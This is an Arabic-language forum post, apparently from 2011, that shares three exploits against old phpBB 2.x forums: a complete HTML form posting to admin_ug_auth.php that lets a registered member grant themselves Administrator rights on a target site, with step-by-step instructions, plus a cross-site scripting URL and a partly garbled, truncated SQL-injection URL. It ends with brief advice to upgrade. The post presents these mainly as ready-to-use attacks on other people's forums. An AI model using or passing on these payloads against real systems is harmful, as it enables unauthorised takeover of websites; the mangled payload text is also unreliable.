ثغرة في منتديات phpbb
شلون الشباب ثغرة بمنتديات phpbb
ثغرة خطيرة جدأ في منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
شفرة
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
عدل هذا العنوان الى عنوان الموقع المستهدف
http://www.domain_name/board_directoryاخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
الحل موجود هنا :
1- اذا كنت مصمم ماتبي غيرهالمنتدى يجب ان تحدث نسختك الى اخر اصدار وهو 2.0.3
2- أنصحك بالأنتقال الى منتدى Invision Board
وزاجل ماقصر نزل تعاريب للمنتدى منتدى حلو وقوي
بس عيبه الهاكات صعب تركيب الهاكات :rolleyes
::::::::
الثغرة رقم2
الاصدر المصاب هو Powered by phpBB 2.0.6
كل ما عليك تطبق الكود
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>document.write(document.&@#&@#&@#&@ #&@#&@#);</script>&category_rows[0][cat_order]=99
الثغرة رقم 3
الاصدر المصاب هو Powered by phpBB 2.0.9
كل ما عليك هو تطبق هذا الكود
http://www.xxxxx.com/privmsg.php?fol...%20LIMIT%201/*منقول
منتدى متعب الشويمان 
موضوع: ثغرة في منتديات phpbb 
الثلاثاء مايو 17, 2011 9:41 pm
